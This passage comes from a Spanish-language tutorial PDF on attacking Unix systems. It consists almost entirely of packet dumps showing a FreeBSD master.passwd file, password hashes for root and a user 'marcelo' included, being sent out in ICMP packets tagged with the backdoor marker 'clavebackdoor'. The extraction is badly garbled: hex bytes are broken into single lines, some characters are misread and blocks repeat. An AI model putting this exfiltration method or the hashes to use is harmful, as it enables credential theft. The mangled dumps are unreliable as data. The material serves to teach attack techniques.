rne-again Superu
ser:/root:.daemo
n:
00
00
00
61
30
20
63
72
72
73
6e
0c
94
1e
63
3a
26
61
3a
6e
65
3a
29
74
00
6b
30
3a
6c
2a
65
72
e1
39
00
64
3a
2f
2f
3a
2d
3a
a2
00
1f
6f
3a
72
62
30
61
2f
26
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
17
01
12
76
30
74
2f
3a
69
6f
31
84
01
56
3a
3a
62
3a
6e
74
96
bf
00
48
43
2f
61
30
20
3a
5b
c0
63
54
68
75
73
3a
53
0a
1f
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
02
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..)..&..1.[...E.
..t9..@.........
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
00
00
00
61
30
73
3a
17
94
02
63
3a
79
2f
31
c1
08
6b
4f
73
72
96
bf
00
64
77
74
6f
5b
00
46
6f
6e
65
6f
1f
00
45
6f
65
6d
74
00
40
18
72
72
20
3a
0c
01
12
2a
20
70
2f
29
37
02
3a
6f
72
75
e1
39
00
31
66
6f
73
a2
c0
63
3a
20
63
72
26
a8
6c
31
6d
65
2f
08
00
61
3a
61
73
73
00
1e
76
3a
6e
73
62
45
c0
65
30
79
65
69
00
a8
62
3a
20
73
6e
..1.[...)..&..E.
......@.79......
....FE....claveb
ackdoor*:1:1::0:
0:Owner of many
system processes
:/root:/usr/sbin
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 174 de 210
2f
72
74
6e
6e 6f 6c 6f 67 69 6e 0a 6f 70 65 72 61 74 6f
3a 2a 3a 32 3a 35 3a 3a 30 3a 30 3a 53 79 73
65 6d 20 26 3a 2f 3a 2f 75 73 72 2f 73 62 69
2f
/nologin .operato
r: * :2:5: :0:0:Sys
tem &:/:/usr/sbi
n/
00
00
00
61
30
73
3a
2f
72
74
6e
Oc
94
le
63
3a
79
2f
6e
3a
65
2f
29
74
00
6b
4f
73
72
6f
2a
6d
el
3a
00
64
77
74
6f
6c
3a
20
a2
00
4e
6f
6e
65
6f
6f
32
26
26
00
45
6f
65
6d
74
67
3a
3a
00
40
18
72
72
20
3a
69
35
2f
17
01
12
2a
20
70
2f
6e
3a
3a
31
84
02
3a
6f
72
75
Oa
3a
2f
96
be
00
31
66
6f
73
6f
30
75
5b
cO
63
3a
20
63
72
70
3a
73
If
a8
6c
31
6d
65
2f
65
30
72
08
00
61
3a
61
73
73
72
3a
2f
00
02
76
3a
6e
73
62
61
53
73
45
cO
65
30
79
65
69
74
79
62
00
a8
62
3a
20
73
6e
6f
73
69
..)..&..1.[...E.
..t:..@
. . . .NE. . . . claveb
ackdoor*:l:l: :0:
0: Owner of many
system processes
:/root :/usr/sbin
/nologin .ope rato
r:*:2:5: :0:0:Sys
tem &:/:/usr/sbi
n/
00
00
00
61
69
6e
61
72
74
30
2f
17
94
02
63
6e
61
6e
2f
79
3a
75
31
Of
08
6b
3a
72
64
73
3a
54
96
27
00
64
2a
69
20
62
2a
74
5b
00
fb
6f
3a
65
53
69
3a
79
If
00
c8
6f
33
73
6f
6e
34
20
00
40
18
72
3a
20
75
2f
3a
53
Oc
01
12
6e
37
43
72
6e
36
61
29
e9
03
6f
3a
6f
63
6f
35
6e
el
dl
00
6c
3a
6d
65
6c
35
64
a2
cO
63
6f
30
6d
3a
6f
33
62
26
a8
6c
67
3a
61
2f
67
33
6f
08
00
61
69
30
6e
3a
69
3a
78
00
le
76
6e
3a
64
2f
6e
3a
3a
45
cO
65
Oa
42
73
75
Oa
30
2f
00
a8
62
62
69
20
73
74
3a
3a
..1.[...)..&..E.
... '..@
claveb
ackdoornologin . b
in:*:3:7: :0:0:Bi
naries Commands
and Source:/:/us
r/sbin/nologin . t
ty:*:4:65533: :0:
0:Tty Sandbox:/:
/u
00 Oc 29 el a2 26 00 17 31 96 5b If 08 00 45 00
00 94 74 3b 00 00 40 01 84 bd cO a8 00 02 cO a8
.&. .1. [.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 175 de 210
00
61
69
6e
61
72
74
30
2f
1e
63
6e
61
6e
2f
79
3a
75
00
6b
3a
72
64
73
3a
54
00
64
2a
69
20
62
2a
74
03
6f
3a
65
53
69
3a
79
c9
6f
33
73
6f
6e
34
20
18
72
3a
20
75
2f
3a
53
12
6e
37
43
72
6e
36
61
03
6f
3a
6f
63
6f
35
6e
00
6c
3a
6d
65
6c
35
64
63
6f
30
6d
3a
6f
33
62
6c
67
3a
61
2f
67
33
6f
61
69
30
6e
3a
69
3a
78
76
6e
3a
64
2f
6e
3a
3a
65
0a
42
73
75
0a
30
2f
62
62
69
20
73
74
3a
3a
..........claveb
ackdoornologin.b
in:*:3:7::0:0:Bi
naries Commands
and Source:/:/us
r/sbin/nologin.t
ty:*:4:65533::0:
0:Tty Sandbox:/:
/u
00
00
00
61
6f
36
53
62
73
6d
2f
17
94
02
63
6c
35
61
69
3a
65
75
31
09
08
6b
6f
35
6e
6e
2a
73
96
1f
00
64
67
33
64
2f
3a
20
5b
00
b6
6f
69
33
62
6e
37
70
1f
00
e8
6f
6e
3a
6f
6f
3a
73
00
40
18
72
0a
3a
78
6c
31
65
0c
01
12
73
6b
30
3a
6f
33
75
29
ef
04
72
6d
3a
2f
67
3a
64
e1
d9
00
2f
65
30
3a
69
3a
6f
a2
c0
63
73
6d
3a
2f
6e
30
2d
26
a8
6c
62
3a
4b
75
0a
3a
75
08
00
61
69
2a
4d
73
67
30
73
00
1e
76
6e
3a
65
72
61
3a
65
45
c0
65
2f
35
6d
2f
6d
47
72
00
a8
62
6e
3a
20
73
65
61
3a
..1.[...)..&..E.
......@.........
..........claveb
ackdoorsr/sbin/n
ologin.kmem:*:5:
65533::0:0:KMem
Sandbox:/:/usr/s
bin/nologin.game
s:*:7:13::0:0:Ga
mes pseudo-user:
/u
00
00
00
61
6f
36
53
62
73
6d
2f
0c
94
1e
63
6c
35
61
69
3a
65
75
29
74
00
6b
6f
35
6e
6e
2a
73
e1
3c
00
64
67
33
64
2f
3a
20
a2
00
be
6f
69
33
62
6e
37
70
26
00
e8
6f
6e
3a
6f
6f
3a
73
00
40
18
72
0a
3a
78
6c
31
65
17
01
12
73
6b
30
3a
6f
33
75
31
84
04
72
6d
3a
2f
67
3a
64
96
bc
00
2f
65
30
3a
69
3a
6f
5b
c0
63
73
6d
3a
2f
6e
30
2d
1f
a8
6c
62
3a
4b
75
0a
3a
75
08
00
61
69
2a
4d
73
67
30
73
00
02
76
6e
3a
65
72
61
3a
65
45
c0
65
2f
35
6d
2f
6d
47
72
00
a8
62
6e
3a
20
73
65
61
3a
..)..&..1.[...E.
..t<..@.........
..........claveb
ackdoorsr/sbin/n
ologin.kmem:*:5:
65533::0:0:KMem
Sandbox:/:/usr/s
bin/nologin.game
s:*:7:13::0:0:Ga
mes pseudo-user:
/u
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 176 de 210
00
00
00
61
2f
6e
30
3a
6f
30
61
17
94
02
63
75
0a
3a
2f
67
3a
67
31
09
08
6b
73
6e
4e
3a
69
30
96
6d
00
64
72
65
65
2f
6e
3a
5b
00
8e
6f
2f
77
77
75
0a
4d
1f
00
0e
6f
73
73
73
73
6d
69
00
40
18
72
62
3a
20
72
61
73
0c
01
12
73
69
2a
53
2f
6e
74
29
ef
05
72
6e
3a
75
73
3a
65
e1
8b
00
2f
2f
38
62
62
2a
72
a2
c0
63
67
6e
3a
73
69
3a
20
26
a8
6c
61
6f
38
79
6e
39
4d
08
00
61
6d
6c
3a
73
2f
3a
61
00
1e
76
65
6f
3a
74
6e
39
6e
45
c0
65
73
67
30
65
6f
3a
20
00
a8
62
3a
69
3a
6d
6c
3a
50
..1.[...)..&..E.
...m..@.........
..........claveb
ackdoorsr/games:
/usr/sbin/nologi
n.news:*:8:8::0:
0:News Subsystem
:/:/usr/sbin/nol
ogin.man:*:9:9::
0:0:Mister Man P
ag
00
00
00
61
2f
6e
30
3a
6f
30
61
0c
94
1e
63
75
0a
3a
2f
67
3a
67
29
74
00
6b
73
6e
4e
3a
69
30
e1
3d
00
64
72
65
65
2f
6e
3a
a2
00
96
6f
2f
77
77
75
0a
4d
26
00
0e
6f
73
73
73
73
6d
69
00
40
18
72
62
3a
20
72
61
73
17
01
12
73
69
2a
53
2f
6e
74
31
84
05
72
6e
3a
75
73
3a
65
96
bb
00
2f
2f
38
62
62
2a
72
5b
c0
63
67
6e
3a
73
69
3a
20
1f
a8
6c
61
6f
38
79
6e
39
4d
08
00
61
6d
6c
3a
73
2f
3a
61
00
02
76
65
6f
3a
74
6e
39
6e
45
c0
65
73
67
30
65
6f
3a
20
00
a8
62
3a
69
3a
6d
6c
3a
50
..)..&..1.[...E.
..t=..@.........
..........claveb
ackdoorsr/games:
/usr/sbin/nologi
n.news:*:8:8::0:
0:News Subsystem
:/:/usr/sbin/nol
ogin.man:*:9:9::
0:0:Mister Man P
ag
00
00
00
61
68
69
2a
75
3a
2f
6d
17
94
02
63
61
6e
3a
72
2f
73
73
31
01
08
6b
72
2f
32
65
76
62
96
ca
00
64
65
6e
32
20
61
69
5b
00
5b
6f
2f
6f
3a
53
72
6e
1f
00
b2
6f
6d
6c
32
68
2f
2f
00
40
18
72
61
6f
32
65
65
6e
0c
01
12
65
6e
67
3a
6c
6d
6f
29
f7
06
73
3a
69
3a
6c
70
6c
e1
2e
00
3a
2f
6e
30
20
74
6f
a2
c0
63
2f
75
0a
3a
44
79
67
26
a8
6c
75
73
73
30
61
3a
69
08
00
61
73
72
73
3a
65
2f
6e
00
1e
76
72
2f
68
53
6d
75
0a
45
c0
65
2f
73
64
65
6f
73
73
00
a8
62
73
62
3a
63
6e
72
6d
..1.[...)..&..E.
......@.........
....[.....claveb
ackdoores:/usr/s
in/nologin.sshd:
hare/man:/usr/sb
*:22:22::0:0:Sec
ure Shell Daemon
:/var/empty:/usr
/sbin/nologin.sm
ms
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 177 de 210
00
00
00
61
68
69
2a
75
3a
2f
6d
0c
94
1e
63
61
6e
3a
72
2f
73
73
29
74
00
6b
72
2f
32
65
76
62
e1
3e
00
64
65
6e
32
20
61
69
a2
00
63
6f
2f
6f
3a
53
72
6e
26
00
b2
6f
6d
6c
32
68
2f
2f
00
40
18
72
61
6f
32
65
65
6e
17
01
12
65
6e
67
3a
6c
6d
6f
31
84
06
73
3a
69
3a
6c
70
6c
96
ba
00
3a
2f
6e
30
20
74
6f
5b
c0
63
2f
75
0a
3a
44
79
67
1f
a8
6c
75
73
73
30
61
3a
69
08
00
61
73
72
73
3a
65
2f
6e
00
02
76
72
2f
68
53
6d
75
0a
45
c0
65
2f
73
64
65
6f
73
73
00
a8
62
73
62
3a
63
6e
72
6d
..)..&..1.[...E.
..t>..@.........
....c.....claveb
ackdoores:/usr/s
hare/man:/usr/sb
in/nologin.sshd:
*:22:22::0:0:Sec
ure Shell Daemon
:/var/empty:/usr
/sbin/nologin.sm
ms
00
00
00
61
3a
75
76
6d
2f
6c
65
17
94
02
63
3a
62
61
71
6e
3a
6e
31
89
08
6b
30
6d
72
75
6f
2a
96
20
00
64
3a
69
2f
65
6c
3a
5b
00
d1
6f
30
73
73
75
6f
32
1f
00
56
6f
3a
73
70
65
67
36
00
40
18
72
53
69
6f
3a
69
3a
0c
01
12
70
65
6f
6f
2f
6e
32
29
6f
07
3a
6e
6e
6c
75
0a
36
e1
d8
00
2a
64
20
2f
73
6d
3a
a2
c0
63
3a
6d
55
63
72
61
3a
26
a8
6c
32
61
73
6c
2f
69
30
08
00
61
35
69
65
69
73
6c
3a
00
1e
76
3a
6c
72
65
62
6e
30
45
c0
65
32
20
3a
6e
69
75
3a
00
a8
62
35
53
2f
74
6e
6c
53
..1.[...)..&..E.
... ..@.o.......
.....V....claveb
ackdoorp:*:25:25
::0:0:Sendmail S
ubmission User:/
var/spool/client
mqueue:/usr/sbin
/nologin.mailnul
l:*:26:26::0:0:S
en
00
00
00
61
3a
75
76
6d
2f
6c
65
0c
94
1e
63
3a
62
61
71
6e
3a
6e
29
74
00
6b
30
6d
72
75
6f
2a
e1
3f
00
64
3a
69
2f
65
6c
3a
a2
00
d9
6f
30
73
73
75
6f
32
26
00
56
6f
3a
73
70
65
67
36
00
40
18
72
53
69
6f
3a
69
3a
17
01
12
70
65
6f
6f
2f
6e
32
31
84
07
3a
6e
6e
6c
75
0a
36
96
b9
00
2a
64
20
2f
73
6d
3a
5b
c0
63
3a
6d
55
63
72
61
3a
1f
a8
6c
32
61
73
6c
2f
69
30
08
00
61
35
69
65
69
73
6c
3a
00
02
76
3a
6c
72
65
62
6e
30
45
c0
65
32
20
3a
6e
69
75
3a
00
a8
62
35
53
2f
74
6e
6c
53
..)..&..1.[...E.
..t?..@.........
.....V....claveb
ackdoorp:*:25:25
::0:0:Sendmail S
ubmission User:/
var/spool/client
mqueue:/usr/sbin
/nologin.mailnul
l:*:26:26::0:0:S
en
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 178 de 210
00
00
00
61
61
70
2f
6e
42
75
0a
17
94
02
63
75
6f
73
64
69
73
70
31
9c
08
6b
6c
6f
62
3a
6e
72
96
93
00
64
74
6c
69
2a
64
2f
5b
00
65
6f
20
2f
6e
3a
20
73
1f
00
ff
6f
55
6d
2f
35
53
62
00
40
18
72
73
71
6e
33
61
69
0c
01
12
64
65
75
6f
3a
6e
6e
29
5c
08
6d
72
65
6c
35
64
2f
e1
65
00
61
3a
75
6f
33
62
6e
a2
c0
63
69
2f
65
67
3a
6f
6f
26
a8
6c
6c
76
3a
69
3a
78
6c
08
00
61
20
61
2f
6e
30
3a
6f
00
1e
76
44
72
75
0a
3a
2f
67
45
c0
65
65
2f
73
62
30
3a
69
00
a8
62
66
73
72
69
3a
2f
6e
..1.[...)..&..E.
......@.\e......
....e.....claveb
ackdoordmail Def
ault User:/var/s
pool/mqueue:/usr
/sbin/nologin.bi
nd:*:53:53::0:0:
Bind Sandbox:/:/
usr/sbin/nologin
.p
00
00
00
61
61
70
2f
6e
42
75
0a
0c
94
1e
63
75
6f
73
64
69
73
70
29
74
00
6b
6c
6f
62
3a
6e
72
e1
40
00
64
74
6c
69
2a
64
2f
a2
00
6d
6f
20
2f
6e
3a
20
73
26
00
ff
6f
55
6d
2f
35
53
62
00
40
18
72
73
71
6e
33
61
69
17
01
12
64
65
75
6f
3a
6e
6e
31
84
08
6d
72
65
6c
35
64
2f
96
b8
00
61
3a
75
6f
33
62
6e
5b
c0
63
69
2f
65
67
3a
6f
6f
1f
a8
6c
6c
76
3a
69
3a
78
6c
08
00
61
20
61
2f
6e
30
3a
6f
00
02
76
44
72
75
0a
3a
2f
67
45
c0
65
65
2f
73
62
30
3a
69
00
a8
62
66
73
72
69
3a
2f
6e
..)..&..1.[...E.
..t@..@.........
....m.....claveb
ackdoordmail Def
ault User:/var/s
pool/mqueue:/usr
/sbin/nologin.bi
nd:*:53:53::0:0:
Bind Sandbox:/:/
usr/sbin/nologin
.p
00
00
00
61
3a
46
65
2f
17
94
02
63
36
69
72
75
31
ad
08
6b
32
6c
3a
73
96
ed
00
64
3a
74
2f
72
5b
00
92
6f
3a
65
6e
2f
1f
00
5b
6f
30
72
6f
73
00
40
18
72
3a
20
6e
62
0c
01
12
72
30
70
65
69
29
4b
09
6f
3a
73
78
6e
e1
0b
00
78
50
65
69
2f
a2
c0
63
79
61
75
73
6e
26
a8
6c
3a
63
64
74
6f
08
00
61
2a
6b
6f
65
6c
00
1e
76
3a
65
2d
6e
6f
45
c0
65
36
74
75
74
67
00
a8
62
32
20
73
3a
69
..1.[...)..&..E.
......@.K.......
.....[....claveb
ackdoorroxy:*:62
:62::0:0:Packet
Filter pseudo-us
er:/nonexistent:
/usr/sbin/nologi
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 179 de 210
6e 0a 5f 70 66 6c 6f 67 64 3a 2a 3a 36 34 3a 36
34 3a 3a 30 3a 30 3a 70 66 6c 6f 67 64 20 70 72
69 76
n._pflogd:*:64:6
4::0:0:pflogd pr
iv
00
00
00
61
3a
46
65
2f
6e
34
69
0c
94
1e
63
36
69
72
75
0a
3a
76
29
74
00
6b
32
6c
3a
73
5f
3a
e1
41
00
64
3a
74
2f
72
70
30
a2
00
9a
6f
3a
65
6e
2f
66
3a
26
00
5b
6f
30
72
6f
73
6c
30
00
40
18
72
3a
20
6e
62
6f
3a
17
01
12
72
30
70
65
69
67
70
31
84
09
6f
3a
73
78
6e
64
66
96
b7
00
78
50
65
69
2f
3a
6c
5b
c0
63
79
61
75
73
6e
2a
6f
1f
a8
6c
3a
63
64
74
6f
3a
67
08
00
61
2a
6b
6f
65
6c
36
64
00
02
76
3a
65
2d
6e
6f
34
20
45
c0
65
36
74
75
74
67
3a
70
00
a8
62
32
20
73
3a
69
36
72
..)..&..1.[...E.
..tA..@.........
.....[....claveb
ackdoorroxy:*:62
:62::0:0:Packet
Filter pseudo-us
er:/nonexistent:
/usr/sbin/nologi
n._pflogd:*:64:6
4::0:0:pflogd pr
iv
00
00
00
61
2f
73
63
64
61
69
2a
17
94
02
63
76
62
70
68
72
6e
3a
31
bb
08
6b
61
69
3a
63
2f
2f
96
c7
00
64
72
6e
2a
70
65
6e
5b
00
62
6f
2f
2f
3a
20
6d
6f
1f
00
8c
6f
65
6e
36
70
70
6c
00
40
18
72
6d
6f
35
72
74
6f
0c
01
12
73
70
6c
3a
6f
79
67
29
3d
0a
65
74
6f
36
67
3a
69
e1
31
00
70
79
67
35
72
2f
6e
a2
c0
63
20
3a
69
3a
61
75
0a
26
a8
6c
75
2f
6e
3a
6d
73
75
08
00
61
73
75
0a
30
73
72
75
00
1e
76
65
73
5f
3a
3a
2f
63
45
c0
65
72
72
64
30
2f
73
70
00
a8
62
3a
2f
68
3a
76
62
3a
..1.[...)..&..E.
......@.=1......
....b.....claveb
ackdoorsep user:
/var/empty:/usr/
sbin/nologin._dh
cp:*:65:65::0:0:
dhcp programs:/v
ar/empty:/usr/sb
in/nologin.uucp:
*:
00 0c 29 e1 a2 26 00 17 31 96 5b 1f 08 00 45 00
00 94 74 42 00 00 40 01 84 b6 c0 a8 00 02 c0 a8
00 1e 00 00 6a 8c 18 12 0a 00 63 6c 61 76 65 62
..)..&..1.[...E.
..tB..@.........
....j.....claveb
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 180 de 210
61
2f
73
63
64
61
69
2a
63
76
62
70
68
72
6e
3a
6b
61
69
3a
63
2f
2f
64
72
6e
2a
70
65
6e
6f
2f
2f
3a
20
6d
6f
6f
65
6e
36
70
70
6c
72
6d
6f
35
72
74
6f
73
70
6c
3a
6f
79
67
65
74
6f
36
67
3a
69
70
79
67
35
72
2f
6e
20
3a
69
3a
61
75
0a
75
2f
6e
3a
6d
73
75
73
75
0a
30
73
72
75
65
73
5f
3a
3a
2f
63
72
72
64
30
2f
73
70
3a
2f
68
3a
76
62
3a
ackdoorsep user:
/var/empty:/usr/
sbin/nologin._dh
cp:*:65:65::0:0:
dhcp programs:/v
ar/empty:/usr/sb
in/nologin.uucp:
*:
00
00
00
61
30
65
63
63
2f
3a
69
17
94
02
63
3a
72
70
61
75
36
63
31
29
08
6b
55
3a
70
6c
75
3a
96
07
00
64
55
2f
75
2f
63
3a
5b
00
59
6f
43
76
62
6c
69
30
1f
00
ce
6f
50
61
6c
69
63
3a
00
40
18
72
20
72
69
62
6f
30
0c
01
12
36
70
2f
63
65
0a
3a
29
cf
0b
36
73
73
3a
78
70
50
e1
f1
00
3a
65
70
2f
65
6f
6f
a2
c0
63
36
75
6f
75
63
70
73
26
a8
6c
36
64
6f
73
2f
3a
74
08
00
61
3a
6f
6c
72
75
2a
20
00
1e
76
3a
2d
2f
2f
75
3a
4f
45
c0
65
30
75
75
6c
63
36
66
00
a8
62
3a
73
75
6f
70
38
66
..1.[...)..&..E.
..)...@.........
....Y.....claveb
ackdoor66:66::0:
0:UUCP pseudo-us
er:/var/spool/uu
cppublic:/usr/lo
cal/libexec/uucp
/uucico.pop:*:68
:6::0:0:Post Off
ic
00
00
00
61
30
65
63
63
2f
3a
69
0c
94
1e
63
3a
72
70
61
75
36
63
29
74
00
6b
55
3a
70
6c
75
3a
e1
43
00
64
55
2f
75
2f
63
3a
a2
00
61
6f
43
76
62
6c
69
30
26
00
ce
6f
50
61
6c
69
63
3a
00
40
18
72
20
72
69
62
6f
30
17
01
12
36
70
2f
63
65
0a
3a
31
84
0b
36
73
73
3a
78
70
50
96
b5
00
3a
65
70
2f
65
6f
6f
5b
c0
63
36
75
6f
75
63
70
73
1f
a8
6c
36
64
6f
73
2f
3a
74
08
00
61
3a
6f
6c
72
75
2a
20
00
02
76
3a
2d
2f
2f
75
3a
4f
45
c0
65
30
75
75
6c
63
36
66
00
a8
62
3a
73
75
6f
70
38
66
..)..&..1.[...E.
..tC..@.........
....a.....claveb
ackdoor66:66::0:
0:UUCP pseudo-us
er:/var/spool/uu
cppublic:/usr/lo
cal/libexec/uucp
/uucico.pop:*:68
:6::0:0:Post Off
ic
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 181 de 210
00
00
00
61
6e
2f
77
6f
6e
3a
69
17
94
02
63
6f
73
3a
72
65
2f
6e
31
9a
08
6b
6e
62
2a
6c
72
75
96
2e
00
64
65
69
3a
64
3a
73
5b
00
e8
6f
78
6e
38
20
2f
72
1f
00
7e
6f
69
2f
30
57
6e
2f
00
40
18
72
73
6e
3a
69
6f
73
0c
01
12
65
74
6f
38
64
6e
62
29
5e
0c
20
65
6c
30
65
65
69
e1
ca
00
4f
6e
6f
3a
20
78
6e
a2
c0
63
77
74
67
3a
57
69
2f
26
a8
6c
6e
3a
69
30
65
73
6e
08
00
61
65
2f
6e
3a
62
74
6f
00
1e
76
72
75
0a
30
20
65
6c
45
c0
65
3a
73
77
3a
4f
6e
6f
00
a8
62
2f
72
77
57
77
74
67
..1.[...)..&..E.
......@.^.......
.....~....claveb
ackdoore Owner:/
nonexistent:/usr
/sbin/nologin.ww
w:*:80:80::0:0:W
orld Wide Web Ow
ner:/nonexistent
:/usr/sbin/nolog
in
00
00
00
61
6e
2f
77
6f
6e
3a
69
0c
94
1e
63
6f
73
3a
72
65
2f
6e
29
74
00
6b
6e
62
2a
6c
72
75
e1
44
00
64
65
69
3a
64
3a
73
a2
00
f0
6f
78
6e
38
20
2f
72
26
00
7e
6f
69
2f
30
57
6e
2f
00
40
18
72
73
6e
3a
69
6f
73
17
01
12
65
74
6f
38
64
6e
62
31
84
0c
20
65
6c
30
65
65
69
96
b4
00
4f
6e
6f
3a
20
78
6e
5b
c0
63
77
74
67
3a
57
69
2f
1f
a8
6c
6e
3a
69
30
65
73
6e
08
00
61
65
2f
6e
3a
62
74
6f
00
02
76
72
75
0a
30
20
65
6c
45
c0
65
3a
73
77
3a
4f
6e
6f
00
a8
62
2f
72
77
57
77
74
67
..)..&..1.[...E.
..tD..@.........
.....~....claveb
ackdoore Owner:/
nonexistent:/usr
/sbin/nologin.ww
w:*:80:80::0:0:W
orld Wide Web Ow
ner:/nonexistent
:/usr/sbin/nolog
in
00
00
00
61
3a
30
73
3a
69
5a
58
17
94
02
63
36
3a
65
2f
6e
51
4c
31
6f
08
6b
35
55
72
75
0a
42
96
99
00
64
35
6e
3a
73
6d
37
5b
00
2c
6f
33
70
2f
72
61
4b
1f
00
1d
6f
34
72
6e
2f
72
64
00
40
18
72
3a
69
6f
73
63
24
0c
01
12
0a
36
76
6e
62
65
58
29
89
0d
6e
35
69
65
69
6c
51
e1
5f
00
6f
35
6c
78
6e
6f
45
a2
c0
63
62
33
65
69
2f
3a
32
26
a8
6c
6f
34
67
73
6e
24
77
08
00
61
64
3a
65
74
6f
31
4d
00
1e
76
79
3a
64
65
6c
24
47
45
c0
65
3a
30
20
6e
6f
2f
42
00
a8
62
2a
3a
75
74
67
69
44
..1.[...)..&..E.
..o...@.._......
....,.....claveb
ackdoor.nobody:*
:65534:65534::0:
0:Unprivileged u
ser:/nonexistent
:/usr/sbin/nolog
in.marcelo:$1$/i
ZQB7Kd$XQE2wMGBD
XL
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 182 de 210
00
00
00
61
3a
30
73
3a
69
5a
58
0c
94
1e
63
36
3a
65
2f
6e
51
4c
29
74
00
6b
35
55
72
75
0a
42
e1
45
00
64
35
6e
3a
73
6d
37
a2
00
34
6f
33
70
2f
72
61
4b
26
00
1d
6f
34
72
6e
2f
72
64
00
40
18
72
3a
69
6f
73
63
24
17
01
12
0a
36
76
6e
62
65
58
31
84
0d
6e
35
69
65
69
6c
51
96
b3
00
6f
35
6c
78
6e
6f
45
5b
c0
63
62
33
65
69
2f
3a
32
1f
a8
6c
6f
34
67
73
6e
24
77
08
00
61
64
3a
65
74
6f
31
4d
00
02
76
79
3a
64
65
6c
24
47
45
c0
65
3a
30
20
6e
6f
2f
42
00
a8
62
2a
3a
75
74
67
69
44
..)..&..1.[...E.
..tE..@.........
....4.....claveb
ackdoor.nobody:*
:65534:65534::0:
0:Unprivileged u
ser:/nonexistent
:/usr/sbin/nolog
in.marcelo:$1$/i
ZQB7Kd$XQE2wMGBD
XL
00
00
00
61
5a
30
64
6f
2f
00
00
17
94
02
63
2f
3a
65
3a
62
00
00
31
ca
08
6b
3a
4d
7a
2f
61
00
96
08
00
64
31
61
3a
75
73
00
5b
00
4c
6f
30
72
2f
73
68
00
1f
00
58
6f
30
63
68
72
0a
00
00
40
18
72
31
65
6f
2f
00
00
0c
01
12
72
3a
6c
6d
6c
00
00
29
2e
0e
31
31
6f
65
6f
00
00
e1
f0
00
2f
30
20
2f
63
00
00
a2
c0
63
6c
30
46
6d
61
00
00
26
a8
6c
6b
31
65
61
6c
00
00
08
00
61
51
3a
72
72
2f
00
00
00
1e
76
69
3a
6e
63
62
00
00
45
c0
65
51
30
61
65
69
00
00
00
a8
62
4f
3a
6e
6c
6e
00
00
..1.[...)..&..E.
......@.........
....LX....claveb
ackdoorr1/lkQiQO
Z/:1001:1001::0:
0:Marcelo Fernan
dez:/home/marcel
o:/usr/local/bin
/bash...........
................
..
00
00
00
61
5a
30
64
6f
2f
00
00
0c
94
1e
63
2f
3a
65
3a
62
00
00
29
74
00
6b
3a
4d
7a
2f
61
00
e1
46
00
64
31
61
3a
75
73
00
a2
00
54
6f
30
72
2f
73
68
00
26
00
58
6f
30
63
68
72
0a
00
00
40
18
72
31
65
6f
2f
00
00
17
01
12
72
3a
6c
6d
6c
00
00
31
84
0e
31
31
6f
65
6f
00
00
96
b2
00
2f
30
20
2f
63
00
00
5b
c0
63
6c
30
46
6d
61
00
00
1f
a8
6c
6b
31
65
61
6c
00
00
08
00
61
51
3a
72
72
2f
00
00
00
02
76
69
3a
6e
63
62
00
00
45
c0
65
51
30
61
65
69
00
00
00
a8
62
4f
3a
6e
6c
6e
00
00
..)..&..1.[...E.
..tF..@.........
....TX....claveb
ackdoorr1/lkQiQO
Z/:1001:1001::0:
0:Marcelo Fernan
dez:/home/marcel
o:/usr/local/bin
/bash...........
................
..
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 183 de 210
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
da
08
6b
20
70
30
36
0a
6c
96
0f
00
64
73
61
35
20
72
24
5b
00
31
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1e
0f
20
74
2c
30
6b
24
37
e1
e9
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@.........
....1.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
47
00
64
73
61
35
20
72
24
a2
00
39
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
0f
20
74
2c
30
6b
24
37
96
b1
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..tG..@.........
....9.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 184 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 185 de 210
Como se puede ver, los Retrying OS detection (try #1) informan sobre la
